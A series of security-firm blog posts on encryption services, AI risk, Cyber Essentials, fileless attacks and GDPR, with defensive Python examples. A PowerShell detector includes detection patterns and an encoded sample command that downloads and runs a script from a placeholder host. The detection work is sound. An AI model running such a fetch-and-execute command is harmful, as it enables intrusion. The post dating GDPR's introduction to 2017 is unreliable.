Managed Security Services

The benefits of using a managed security service

Most organisations understand the importance of keeping data secure, but the cost of doing so on an on-going basis can prove prohibitive, especially for small and medium-sized businesses, where budget constraints and a lack of in-house expertise are often areas of concern. So what are the benefits of using a managed security service?

What are organisations choosing?

Managed cloud providers can enable access to technology services in a cost-effective way, bypassing the need to perform functions in-house. But these services can leave a company’s data exposed to theft, tampering or even seizure by law enforcement agencies from many jurisdictions, exposing the data owner to large fines, bad press and possible business collapse.

Some businesses choose to use an encryption service offered by their service provider. However, this leaves them in a weak position as the encryption is tied to that service provider and can’t expand across multiple hosting companies.

A further concern is where encryption keys are stored. If they are held by the hosting company, its staff could still view your data because they hold the keys; and if the company is not UK based, the data may be made available to, for example, government agencies. This is especially relevant if the storage company is US-based, since the Patriot Act came into force.

And, whilst the best way to protect data is by encryption, which renders it unreadable to unauthorised people, it is vital that the data can be monitored, reporting on who, or what is accessing the data and when.  This is a service that many cloud hosting services do not provide.

Simply going with one provider and not thinking of the wider consequences is leading many businesses down a false path of confidence, taking a ‘head in the sand’ stance and thinking data loss just won’t happen to them whilst they are with a big hosting provider.

The solution: managed security services

But, there is a solution and it is the use of a managed security service.  Such a service offers functionality that can smooth out many of the problems involved with managing data security systems. It can control on-going budgetary pressures and separate the duties between cloud service providers, data owners and data protection.

Digital Pathways managed security service

The Digital Pathways Managed Security Service uses the nCrypt solution that can handle the full range of encryption needs, both for data in transit and at rest, including full-data encryption of any server and it is transparent to the application or data structure (i.e. databases). This means that encryption and key management are provided as a unified service across all platforms.

Security server appliances are located in a protected UK-based Network Operations Centre (NOC), where all encryption keys and security policies are stored. The encryption is enforced at the point of data access, whether that is in the cloud or within clients’ premises. It provides separation of duty between security policy and data access.

Once deployed the system provides extensive auditing of all access to data, both authorised and unauthorised, which can then be used to report to management on system activities, compliance reporting, such as GDPR and PCI or data breaches where detailed analysis is required across multiple systems, to identify any weakness or rogue activity.

Reports are generated in an easy-to-understand format and are emailed to designated contacts on an agreed schedule. All logs gathered, whether from applications or proprietary systems, are stored securely in their raw format to meet auditing requirements. They are also available for use in wider reporting and management, internal audits or as evidence during an investigation.

The Digital Pathways Managed Security Service takes away the ‘pain points’, including interoperability, associated with deploying a robust data protection and auditing system. It provides organisations with reduced costs in terms of encryption deployment, maintenance and management and offers more effective controls through the provision of centralised monitoring, logging and reporting capabilities.

Using a managed security service can ensure that your digital assets remain secure, keeping your company compliant.

Every organisation can benefit from added protection. Call us on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.

Artificial Intelligence, Friend or foe?

AI, Friend or Foe?

Artificial Intelligence (AI) and Machine Learning (ML) in Cybersecurity

The buzzwords, Artificial Intelligence (AI) and Machine Learning (ML) are often interchanged. However, they are not the same thing, which can lead to confusion.

What is Machine Learning?

Machine Learning is a type of Artificial Intelligence (AI) that allows software applications to become more accurate in predicting outcomes, without being explicitly programmed.

What is Artificial Intelligence?

Artificial Intelligence (AI) is the process of simulating human intelligence, using machines, especially computer systems. The process includes learning (the acquisition of information and rules for using the information), reasoning (using the rules to reach approximate or definite conclusions) and self-correction.

AI is already used in many circumstances, including in our buildings. For example, by monitoring the number of people in any area of an office, AI can decide whether the air-conditioning should be switched on or whether lowering the shades or opening the windows will suffice.

And, AI will continue to expand into our daily business and personal lives.

Can Artificial Intelligence (AI) programmes ‘go rogue’?

But, although the benefits look good, there is a fear that such AI programmes could ‘go rogue’ and turn on us, or be hacked by other AI programmes.

Hackers love Artificial Intelligence (AI) and Machine Learning (ML) as much as everyone else in the technology space and are increasingly using it to improve their phishing attacks. The need for innovative and robust data security therefore becomes even more important.

Imagine a hacker taking over a building’s security system by accessing the system’s intelligence and having all key personnel move to one room, under the pretext of a ‘gunman threat’. Once the key people are in the room, identified through the AI’s facial recognition, the system locks it and ransom threats are sent to all the computer screens in the building, using ransomware tactics such as ‘the ticking countdown clock’ to make people react quickly.

Although AI looks good, many of our current systems are not so ‘smart’ and use old technology. Simply bolting on AI will not give the perceived benefits, as it will be held back by the lack of integration. Given the high cost of system replacement, such as Heating, Ventilation and Air Conditioning (HVAC), it will be some time before the platforms are available to exploit the benefits of AI.

The GDPR and Artificial Intelligence (AI) Conundrum

The General Data Protection Regulation (GDPR) poses another conundrum. Will it be permissible to let a user give an application permission to make automated decisions on their behalf, as recommendation systems do? These were first implemented on music content sites but now extend to many different industries.

For example, the AI system may learn of a user’s content preferences and push content that fits those criteria. This can help companies reduce bounce rate, by keeping the user interested. Likewise, you can use the information learned by your AI to craft better-targeted content to users with similar interests.

However, GDPR will see the AI application as holding User Personally Identifiable Information (PII), which might include age, gender and location, to present the information it has learnt from one user to others, with similar profiles. The GDPR requires that the data be secure and used appropriately. But, with the AI program constantly learning and sampling data, this becomes a problem.

And, if a user does give permission for their data to be modelled, will it be accompanied by a comprehensible explanation of how the AI makes decisions and how these decisions may impact that user? This would be very difficult to achieve as GDPR calls for ‘clear language’ and AI code learning is far from easy to explain.

From a technical perspective, the level of granularity GDPR requires, in explaining automated decisions, is unclear. Until the picture is clarified, some innovators may choose to forge ahead with super algorithms. Others, worryingly, may ban European citizens from using some highly valuable functionality.

Three laws of robotics

When thinking about automating important decisions and giving high-stake autonomy to AI machines, particular attention should be given to constraining their behaviour by defining what is desired, what is acceptable and what is not acceptable. This is what the Three Laws of Robotics of the science-fiction writer, Isaac Asimov, say:

1. A robot may not injure a human being or, through inaction, allow a human being to come to harm
2. A robot must obey the orders given by human beings, except where such orders would conflict with the First Law
3. A robot must protect its own existence as long as such protection does not conflict with the First or Second Laws.

The need for human intervention

AI power will need to be controlled, and the Three Laws of Robotics need to be the mantra for AI programs. It should be mandated in all code that AI programs ask for human intervention when unusual situations are detected, or when the computed uncertainty in predictions or decisions is above a certain threshold. This may go against the vision of AI, but until we can have total trust in the underlying code being used to develop it, we must show caution. Remember, humans are still writing the code and can make mistakes or, more worryingly, add code that will allow for future control of the AI for malicious ends.
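The "ask for a human when uncertainty is above a threshold" rule above can be made concrete as a decision gate in front of the model's output. The following is an added example, not code from Digital Pathways or from any AI product; the thresholds, the labels and the building-control scenario are assumptions for illustration. It measures uncertainty two ways (normalised entropy of the probability vector and the gap between the top two options), treats a malformed probability vector as an "unusual situation", and returns a record that can be logged for later audit.

```python
import math
from typing import Dict, Sequence

# Hypothetical policy thresholds for this example; a real system would tune them per use case.
ENTROPY_THRESHOLD = 0.6   # normalised entropy above this: the model is spread across options
MARGIN_THRESHOLD = 0.2    # gap between the top two options below this: too close to call


def normalised_entropy(probs: Sequence[float]) -> float:
    """Shannon entropy of a probability vector scaled to [0, 1] (1 = uniform, 0 = certain)."""
    n = len(probs)
    if n < 2:
        return 0.0
    entropy = -sum(p * math.log(p) for p in probs if p > 0)
    return entropy / math.log(n)


def decide(labels: Sequence[str], probs: Sequence[float],
           entropy_threshold: float = ENTROPY_THRESHOLD,
           margin_threshold: float = MARGIN_THRESHOLD) -> Dict:
    """Return the model's action, or 'escalate' to a human when it is not confident enough.

    The returned record carries the numbers the decision was based on, so the
    decision can be logged and audited later.
    """
    if len(labels) != len(probs) or len(labels) < 2:
        raise ValueError("need at least two labelled options with matching probabilities")
    if any(p < 0 for p in probs) or abs(sum(probs) - 1.0) > 1e-6:
        # An unusual situation: the model produced something that is not a
        # probability distribution. Escalate rather than guess.
        return {"action": "escalate", "reason": "invalid probability vector"}

    ranked = sorted(zip(probs, labels), reverse=True)
    top_p, top_label = ranked[0]
    margin = top_p - ranked[1][0]
    entropy = normalised_entropy(probs)
    record = {"proposed": top_label, "confidence": round(top_p, 3),
              "margin": round(margin, 3), "entropy": round(entropy, 3)}
    if entropy > entropy_threshold or margin < margin_threshold:
        record.update(action="escalate", reason="uncertainty above threshold")
    else:
        record.update(action=top_label, reason="confident")
    return record


if __name__ == "__main__":
    # Constructed outputs of a hypothetical building-control classifier.
    print(decide(["hold doors", "release doors"], [0.95, 0.05]))
    print(decide(["hold doors", "release doors", "alert security"], [0.4, 0.35, 0.25]))
```

Both thresholds are deliberately independent: a model can be fairly sure of its top choice yet have a near-tied runner-up, and either condition alone is enough to hand the decision to a person.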

It is almost impossible to say how an organisation can have trust in any AI unless they have access to the source code and the ability, or contacts, to read and debug it. As AI is introduced it will fall on the facilities teams to question what level of code review has been undertaken within the AI module. This might be possible if the designer of the AI is a large vendor who can show in-depth test results and other customer implementations but, most AI vendors leading the technology revolution are small and do not have the client base, or the volume, of test data.

At this point, a difficult decision needs to be taken by management as to how far they ‘dip their toe’ into AI. A bit like autonomous cars, they do work but governments are still wary of allowing legislation to be brought in, to allow the technology.

AI is with us and will increasingly be integrated into our lives. Whilst the potential benefits are far-reaching, making lives better, the environment cleaner and providing efficiency to our personal and business lives, we must be aware of the possible threats it can create and take the appropriate action from the very beginning.

Need advice on Artificial Intelligence and Machine Learning?

Every organisation can benefit from added protection. If you have concerns with regard to Artificial Intelligence and Machine Learning, give us a call on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.


Why do Businesses need the Cyber Essentials Programme?

The government’s Cyber Essentials Programme was developed in collaboration with industry and is intended to help businesses mitigate common online threats.

Operated by the National Cyber Security Centre (NCSC), it was launched in 2014 and has become a key element of excellence for cybersecurity, in all its forms.

Helping build robust data security strategies

Applicable to all sizes of organisations, from small to large, it offers help to those seeking to implement a robust data security strategy in order to protect both themselves and their clients.

It does this by encouraging organisations to adopt good practice in information security and includes a simple set of security controls to protect information from threats coming from the Internet.

Most cyber attacks are basic in form and are often carried out by unskilled individuals. The controls suggested by the Cyber Essentials scheme are designed to prevent such attacks.

Cyber Essentials formats

Cyber Essentials comes in two formats:

  1. Cyber Essentials – a self-assessment application that addresses basic threats and helps to prevent the most common attacks.
  2. Cyber Essentials Plus – the same as Cyber Essentials, but rather than being self-assessed it requires verification of cybersecurity carried out independently by a Certification Body. This is a more rigorous form of certification, better at demonstrating to potential customers that your data security position is good and tested.

The scheme offers a sound foundation of basic hygiene measures that all types of business can implement and potentially build upon. The government believes that implementing these measures can significantly reduce an organisation’s vulnerability. However, it is not a silver bullet that removes all cybersecurity risk; for example, it is not designed to address more advanced, targeted attacks, and organisations facing these threats will need to implement additional measures as part of their security strategy. What it can do is define a focused set of controls that provide cost-effective, basic cybersecurity for organisations of all sizes.

The Assurance Framework for Cyber Essentials

The Assurance Framework, leading to the awarding of Cyber Essentials and Cyber Essentials Plus Certificates, has been designed in consultation with SMEs to be light-touch and achievable at low cost. The two options give a choice over the level of assurance given, as well as the cost of obtaining it. It is important to recognise that certification only provides a snapshot of cybersecurity practices at the time of assessment. Maintaining a robust cybersecurity stance requires additional measures, such as a sound risk management approach as well as on-going attention to the Cyber Essentials control themes, i.e. patching. But the scheme does offer the right balance between demonstrating a commitment to cyber security to third parties and retaining a simple, low-cost mechanism for doing so.

Delivering many benefits

For businesses who are willing to adopt these measures, the benefits can be many, including: the ability to tender for contracts that require a Cyber Essentials Certified supplier, enhanced customer trust and confidence, the provision of market differentiation and competitive advantage, protection of company assets and IP, the mitigation of common cyber threats and reduced insurance premiums.

The General Data Protection Regulation (GDPR)

And, becoming accredited helps to meet the requirements of GDPR. For example, GDPR talks about controlling who has access to data and understanding where PII is held. Cyber Essentials covers this and can therefore provide evidence for your GDPR statements and policies that, as an organisation, you have considered these areas and have had the controls verified by an independent assessor.

Businesses now live with the spectre of cyber attacks as the norm. Adopting the Cyber Essentials scheme is one way of taking control and starting the process of fighting back.

Every organisation can benefit from added protection. Give us a call on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.


Coming to terms with a ‘man in the middle attack’

The term a ‘man in the middle attack’ is becoming well known as more instances of them take place.

What is a ‘Man in the middle attack’?

What exactly does ‘man in the middle attack’ mean? It is when a cyber-criminal secretly intercepts and possibly alters communication between two parties, who both believe they are directly communicating with each other.

A common example is where the cyber-criminal uses bogus emails to trick solicitors into paying the proceeds of a house sale into the criminal’s own bank account, rather than to the bona fide person.

Another example is where an Internet connection is intercepted, often because a user has not checked that they are using a valid Wi-Fi network. The hacker uses a device to emulate the valid Wi-Fi in, say, a hotel, and the unsuspecting victim connects to it. The hacker allows them to browse as normal until the victim goes to a site of interest, such as a bank account. The hacker then lets the user log on to their account but breaks the connection to the victim, keeping the link to the bank open. The victim thinks the connection was lost due to the hotel’s poor Wi-Fi, but the hacker continues to empty the victim’s bank account.

These kinds of attacks highlight weaknesses in an organisation’s data security strategy. Either the business has been hacked with malware, which allows the monitoring of systems; it may be due to an insider attack, where someone with internal system access is selling information to third parties; or it may simply be poor user education or monitoring.

Data protection rackets

Increasingly today, incidents of data protection rackets, where malware is embedded and cunningly hidden, are being reported. These attacks are designed to go undetected by the organisation while the data it holds is scanned. The objective is that when valuable data is found or a file changed, such as an intellectual property modification, the content is sent to the hacker, who can then sell the information on to competitors. Another data mine is where an organisation is bidding for a large contract and the hacker gains access to the proposal and sells it to competing bidders so they can undercut. Over time the hacker might make the organisation aware of its activities and use this, just like the old-fashioned protection rackets of the prohibition era, demanding money not to send out the information.

And, a ‘man in the middle attack’ is not confined to email correspondence. It could also include voice communications, as most telephone systems use VOIP (Voice Over Internet Protocol).

Systems must be strengthened

Steps must be taken to strengthen systems against such attacks. Strong internal controls and audit procedures are needed in order to stop malware infiltrating systems in the first place, taking over the network.

Adopting advanced threat protection is vital as it stops bad processes starting, instantly blocking malware attacks. It can signal any unusual behaviour of staff and systems i.e. showing when an application is sending out data when it should not.

And of course, robust internal controls and checks should be employed when using support companies as well as the checking of system logs and user access, to understand who is touching the data, ensuring that access to it is normal. Anything odd should raise a flag.
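The check described above, reviewing who is touching the data and raising a flag on anything odd, can be automated against access logs. The following is an added example and not Digital Pathways’ code or tooling; the log format (one `timestamp user=… action=… object=…` line per access), the working-hours window and the burst limit are assumptions, and the log lines are constructed for the example. A known-good period is used to learn which top-level data areas each user normally touches; the review period is then flagged for unknown users, first-time access to a new area, out-of-hours access and bursts of access.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample log lines in a simple key=value format; not real system output.
BASELINE_LOG = """\
2024-03-04T09:12:03Z user=alice action=read object=/finance/q1-ledger.xlsx
2024-03-04T10:40:11Z user=alice action=read object=/finance/invoices.csv
2024-03-04T11:05:44Z user=bob action=read object=/engineering/design.docx
2024-03-05T09:00:00Z user=bob action=write object=/engineering/spec.md
"""

REVIEW_LOG = """\
2024-03-06T09:30:00Z user=alice action=read object=/finance/q1-ledger.xlsx
2024-03-06T02:15:00Z user=bob action=read object=/finance/payroll.xlsx
2024-03-06T10:00:00Z user=svc-backup action=read object=/engineering/spec.md
2024-03-06T14:00:01Z user=bob action=read object=/engineering/a.md
2024-03-06T14:00:02Z user=bob action=read object=/engineering/b.md
2024-03-06T14:00:03Z user=bob action=read object=/engineering/c.md
2024-03-06T14:00:04Z user=bob action=read object=/engineering/d.md
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) action=(?P<action>\S+) object=(?P<obj>\S+)$")


def parse(log_text):
    """Turn log text into event dicts; malformed lines are skipped rather than aborting the review."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        ev["area"] = ev["obj"].split("/")[1]  # top-level folder, e.g. "finance"
        events.append(ev)
    return events


def build_baseline(log_text):
    """Map each user to the set of top-level areas they touched in the known-good period."""
    baseline = defaultdict(set)
    for ev in parse(log_text):
        baseline[ev["user"]].add(ev["area"])
    return dict(baseline)


def flag_anomalies(baseline, log_text, work_hours=(7, 19), burst_limit=3):
    """Return the review-period events that deserve a second look, each with its reasons."""
    flagged = []
    per_user = Counter()
    for ev in parse(log_text):
        reasons = []
        if ev["user"] not in baseline:
            reasons.append("unknown user")
        elif ev["area"] not in baseline[ev["user"]]:
            reasons.append(f"first access to /{ev['area']}")
        if not (work_hours[0] <= ev["ts"].hour < work_hours[1]):
            reasons.append("outside working hours")
        per_user[ev["user"]] += 1
        if per_user[ev["user"]] == burst_limit + 1:  # report the burst once, when the limit is crossed
            reasons.append(f"more than {burst_limit} accesses in review window")
        if reasons:
            flagged.append({"user": ev["user"], "object": ev["obj"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in flag_anomalies(build_baseline(BASELINE_LOG), REVIEW_LOG):
        print(hit)
```

The baseline is deliberately coarse (top-level area rather than individual file) so that normal day-to-day work does not drown the reviewer in flags; the aim is to surface the unusual cases, such as an engineering user reading payroll files at two in the morning, for a human to check.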

Emails should be secured, especially if personally identifiable information is being sent, and confirmation techniques such as send and receive reports should be used. These should not be under the control of the receiver, as in Outlook, where a receiver can block read receipts.

Adopting Cyber Essentials Plus

The Cyber Essentials Plus Certification can offer solutions too. Cyber Essentials is a government information assurance scheme, operated by the National Cyber Security Centre (NCSC), that launched in 2014 and has become a key element of excellence for cybersecurity, in all its forms.

It does this by encouraging organisations to adopt good practice in information security and includes a simple set of security controls to protect information from threats coming from the Internet.

The Cyber Essentials Plus Certification requires verification of cybersecurity, carried out independently by a Certification Body, a more rigorous form of certification.

Joining up to the scheme can ensure that systems are regularly assessed and weaknesses dealt with so as to stop any security breaches, not just ‘man in the middle’.

Every organisation can benefit from added protection.

Give us a call on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.


Fileless Attacks: How do you protect your organisation from a threat you can’t see?

Fileless Attacks: The Threat You Can’t See

Fileless attacks are on the rise. A study by the Ponemon Institute found that 29% of the attacks faced by organisations during 2017 were fileless. This number has been increasing year on year and is expected to reach 35% in 2018.

The reason for this increase is simple. Hackers know they stand a greater chance of succeeding with a fileless attack because they are more difficult to detect. Traditional anti-malware and anti-virus tools search for malicious software by scanning a computer’s hard drive. This has led cybercriminals to pursue attacks that avoid the hard drive altogether.

How do fileless attacks work?

To avoid the hard drive, hackers hide malicious code in memory instead, using authorised native programs and tools within the operating system to attack by stealth.

This is how an attack against your organisation could occur:

  1. An employee receives a spam email with a link to a malicious website.
  2. The employee clicks on the link.
  3. The malicious website loads an authorised program, such as Flash, on the employee’s computer and exploits its known vulnerabilities.
  4. The program then opens Windows PowerShell, a native Windows tool, which is able to execute instructions through the command line while operating in memory.
  5. PowerShell downloads and runs a malicious script.
  6. The PowerShell script locates data on the employee’s computer and sends it to the attacker.

Using authorised applications already installed on the target’s computer is more discreet than placing a file on the user’s computer. The hacker can undertake the same types of attack as they otherwise could, such as ransomware attacks, but is far less likely to be noticed. This is why it is essential to patch and update your operating systems and software applications swiftly.

Although not truly a ‘fileless’ attack, the same attack could occur if an employee opens a Word or PDF document sent from a malicious source. With a Word document, for instance, the attack will use a Microsoft Office macro to launch PowerShell and run the hacker’s script. Programs such as Adobe PDF Reader and JavaScript all have known vulnerabilities which hackers seek to use to their advantage.
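The chain described in the six steps above and in the Word-macro variant leaves a visible trace even though nothing is written to disk: a document or browser process starts PowerShell, and the PowerShell command line carries the instructions to fetch and run a remote script. The following is an added example of how a defender can test process-creation events for that trace; it is not code from Digital Pathways or from any endpoint product. The event fields mirror the ParentImage, Image and CommandLine fields of a Sysmon process-creation event, the parent and indicator lists are assumptions, and the three events are constructed for the example (the hostile-looking one uses a placeholder `example.invalid` address).

```python
import base64
import re

# Parent processes from which launching a script host is rarely legitimate (assumed list).
DOCUMENT_AND_BROWSER_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe",
    "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line fragments that commonly appear when PowerShell is used to pull and run a remote script.
SUSPICIOUS_TOKENS = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution policy bypass", re.compile(r"-(?:ep|ex|executionpolicy)\s+bypass", re.I)),
    ("remote download", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)),
    ("in-memory execution", re.compile(r"invoke-expression|\biex\b", re.I)),
]
ENCODED_RE = re.compile(r"-e(?:nc|c|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text; return the text or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_event(ev):
    """Return the list of findings for one process-creation event (empty list = nothing odd)."""
    parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    findings = []
    if parent in DOCUMENT_AND_BROWSER_PARENTS and image in SCRIPT_HOSTS:
        findings.append(f"{image} spawned by {parent}")
    text = ev["command_line"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append("encoded command")
        text = text + " " + decoded  # scan the decoded script as well as the visible command line
    for name, pattern in SUSPICIOUS_TOKENS:
        if pattern.search(text):
            findings.append(name)
    return findings


# Constructed sample events. The second one models step 4/5 of the chain above;
# its encoded payload is built here from a placeholder string so the sample is self-contained.
DECODED_SAMPLE = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
ENCODED_SAMPLE = base64.b64encode(DECODED_SAMPLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -w hidden -ep bypass -enc {ENCODED_SAMPLE}"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": "splwow64.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["image"].rsplit("\\", 1)[-1], "->", assess_event(ev) or "nothing odd")
```

Two design points matter here. The parent/child rule fires on its own, so a macro that launches PowerShell with a perfectly innocuous-looking command line is still reported; and the encoded command is decoded before the indicator scan, because the visible command line of such a launch usually shows nothing but a base64 blob. A scheduled backup run from Explorer and Word printing through `splwow64.exe` both come back clean, which is the false-positive check a detection like this needs.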

Fileless attacks will continue to rise until organisations become effective at identifying and defending themselves from this type of attack. Cybersecurity tools that learn and analyse patterns of behaviour are better placed to spot unusual activity on your networks, which could afford some protection against fileless attacks.

Cybersecurity Training

However, relying on cybersecurity tools alone is not enough. Training staff to recognise fraudulent and spam emails also needs to be a crucial element of your cybersecurity strategy. Spam emails are becoming less obvious to spot, often looking near identical to emails from a legitimate source. The few seconds it takes an employee to check the sender’s email address is accurate could be the difference between a successful and unsuccessful attack against your company.

As new modes of threat emerge, organisations must rethink the ways they protect themselves, and analyse the cybersecurity tools they use.

If you have concerns about your cybersecurity, give us a call on 0844 586 0040 or email: intouch@digitalpathways.co.uk.

We’re here to help.


How are Word-based fileless attacks targeting aid organisations?

Imagine you have opened a Word file that was emailed to you by a prominent organisation in your field. On the surface, nothing else happens. You notice no changes and your antivirus system doesn’t detect anything suspicious. Would you (or your employees) expect to be spied on by hackers?

This March, McAfee identified a new fileless hacking operation which is targeting humanitarian aid organisations worldwide. ‘Operation Honeybee’ tricks its targets into opening compromised Word documents. When this is achieved, their malware takes hold in the computer and allows the hackers to spy on their target undetected. They are able to escape scrutiny because of their fileless strategy.

Fileless Attacks

There has been a surge in fileless attacks. A study by the Ponemon Institute predicts they will comprise 35% of all cyber attacks in 2018. As hard drive-focused antivirus scanners become more effective, hackers are resorting to strategies which do not leave files in your directory. Instead, they exploit known weaknesses in legitimate programs which are already on your computer. Once they have gained a foothold there, they can run commands which allow them to spy on you, mine cryptocurrency, ransom your files, and even take over your entire system.

Honeybee and spear phishing pierce your defences

Another dangerous aspect of the Honeybee operation is its use of ‘spear phishing’; a more sophisticated form of phishing. Where ordinary phishing campaigns send out misleading emails in bulk, and cross their fingers, spear phishing tailors its message to appeal to a particular target in order to increase its chances of success.

In the case of Honeybee, the hackers designed their initial email to pass for a message from the International Red Cross. They then used the decoy document to ambush employees of the aid organisations they wanted to spy on.

The Red Cross is a perfect disguise for a spear phishing operation, as it is a well-known, trusted organisation. Combining this with the fileless nature of the attack, it is even more likely to escape detection. This joint strategy can be adapted to target any industry.

Joint strategy; twofold solution

If hackers are purposefully evading traditional antivirus strategies, how can you keep your system safe? There is a twofold solution.

First of all, there are innovative antivirus programs which do protect against fileless attacks. The latest cybersecurity tools use machine learning to pinpoint unusual activity on your system. This allows them to eliminate threats which would otherwise remain hidden.

Secondly, you can implement a training strategy which will increase awareness of the strategies used by hackers. When properly prepared, members of your organisation can neutralise a threat by taking as little as a minute to verify the source of emails they receive. It really can be that simple.

Every organisation can benefit from added protection. Give us a call on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.


Building trust: What GDPR can do for your council

How would the introduction of GDPR have affected Basildon Council?

Prior to the introduction of GDPR (General Data Protection Regulation) in 2017, Basildon Council was fined £150,000 for failing to store personal data securely. Because there was no adequate data protection policy in place, details of a family’s disabilities, including mental health issues, were published online. They remained publicly accessible for weeks. This incident had huge reputational and financial repercussions for the Council.

The £150,000 fine was imposed under the old Data Protection Act. With the enforcement of GDPR in May, the ICO are now able to impose higher fines, which go up to 4% of the organisation’s turnover, or €20,000,000, whichever is greater. What’s more, the scope of the new legislation is far broader, setting higher standards of transparency for any organisation that handles EU citizens’ data.

Councils are already failing internal audits and incurring fines on an annual basis. What will happen now GDPR is enforceable? Unless action is taken now, councils stand to fall short of the new rules and be subject to the new fines. The purpose of GDPR is to protect citizens’ rights, not to cause councils to incur avoidable costs. How can GDPR help councils prevent the kind of incident Basildon has seen, and foster trust among residents?

How can new legislation help?

There is a lot of apprehension among residents regarding their privacy. Who holds my data, and why? If personal data is stored, is it being held securely? GDPR is designed to provide answers to those questions.

If an organisation is GDPR compliant, it means that personal data is only being stored when strictly necessary and under the best possible safeguards. More than that, GDPR puts control over data back into citizens’ hands, creating a new era of transparency. This is how GDPR, instead of remaining a looming spectre, can become a tool for councils to build trust.

GDPR compliancy for councils

The task for councils is clear: they must be able to map out the exact course data takes through their systems. When a resident requests to see their personal data, the council must be able to recover it. If you imagine the amount of data currently in the hands of councils, much of it in archival storage, you will see that this is a huge undertaking.

There are other liabilities councils may not even be aware of, such as their Active Directory management. Too often, when council employees change roles, their accounts remain active. This means that they can be exploited by disgruntled ex-employees, and even become targets for hackers. By implementing a system which closes obsolete accounts, councils can ensure that access is granted only to the right people.
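The Active Directory problem above, accounts that stay enabled after someone leaves or changes role, is a review that can be run routinely against a directory export. The following is an added example and not Digital Pathways’ code or any council’s process; the department-to-group policy, the 90-day inactivity rule and the account records are all constructed for the example. It produces a list of recommended actions (disable the account, or remove a group the user’s current department is not entitled to) rather than changing anything itself, so the output can go to a person for approval.

```python
from datetime import date, timedelta

INACTIVE_DAYS = 90  # hypothetical policy: an enabled account unused for this long is disabled

# Hypothetical policy: which groups each department may hold.
DEPARTMENT_GROUPS = {
    "Housing": {"Housing-Caseworkers"},
    "Finance": {"Finance-Payments", "Finance-Reports"},
    "Planning": {"Planning-Applications"},
}

# Constructed account export, in the shape of a directory report; not real council data.
ACCOUNTS = [
    {"account": "jsmith", "department": "Housing", "enabled": True,
     "last_logon": date(2024, 3, 1), "groups": {"Housing-Caseworkers"}, "left": None},
    # Moved from Finance to Planning but kept the payments group from the old role.
    {"account": "mjones", "department": "Planning", "enabled": True,
     "last_logon": date(2023, 10, 2), "groups": {"Planning-Applications", "Finance-Payments"}, "left": None},
    # Left the council in December but the account was never disabled.
    {"account": "rpatel", "department": "Finance", "enabled": True,
     "last_logon": date(2023, 11, 20), "groups": {"Finance-Reports"}, "left": date(2023, 12, 1)},
    # Created for a temp who never logged on.
    {"account": "temp01", "department": "Housing", "enabled": True,
     "last_logon": None, "groups": set(), "left": None},
    {"account": "old-admin", "department": "Finance", "enabled": False,
     "last_logon": date(2022, 1, 5), "groups": {"Finance-Payments"}, "left": None},
]


def review_accounts(accounts, today, inactive_days=INACTIVE_DAYS, policy=DEPARTMENT_GROUPS):
    """Return (account, recommended action) pairs for every enabled account that breaks policy."""
    actions = []
    cutoff = today - timedelta(days=inactive_days)
    for acct in accounts:
        if not acct["enabled"]:
            continue  # already disabled; nothing to do
        if acct["left"] is not None:
            actions.append((acct["account"], "disable: user has left"))
            continue
        if acct["last_logon"] is None or acct["last_logon"] < cutoff:
            actions.append((acct["account"], f"disable: no logon in {inactive_days} days"))
        allowed = policy.get(acct["department"], set())
        for group in sorted(acct["groups"] - allowed):
            actions.append((acct["account"],
                            f"remove from {group}: not permitted for {acct['department']}"))
    return actions


if __name__ == "__main__":
    for account, action in review_accounts(ACCOUNTS, date(2024, 3, 10)):
        print(f"{account:10} {action}")
```

Running this on a schedule and acting on its output is what turns "close obsolete accounts" from an intention into a control; the leaver and inactivity checks catch the forgotten account, and the group check catches the quieter problem of privileges that followed someone into a new job.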

There are big cost-saving benefits to be achieved by creating a safe, streamlined and transparent data policy. As well as avoiding fines and passing internal audits, in the process of becoming GDPR compliant, councils can effect substantial savings by reducing their storage of obsolete data.

We have the experience and expertise to reform your data management. If you are a council looking for a GDPR compliancy solution, please contact us on 0844 586 0040 or intouch@digitalpathways.co.uk.


Private Schools and Parents Face Cyber Threat

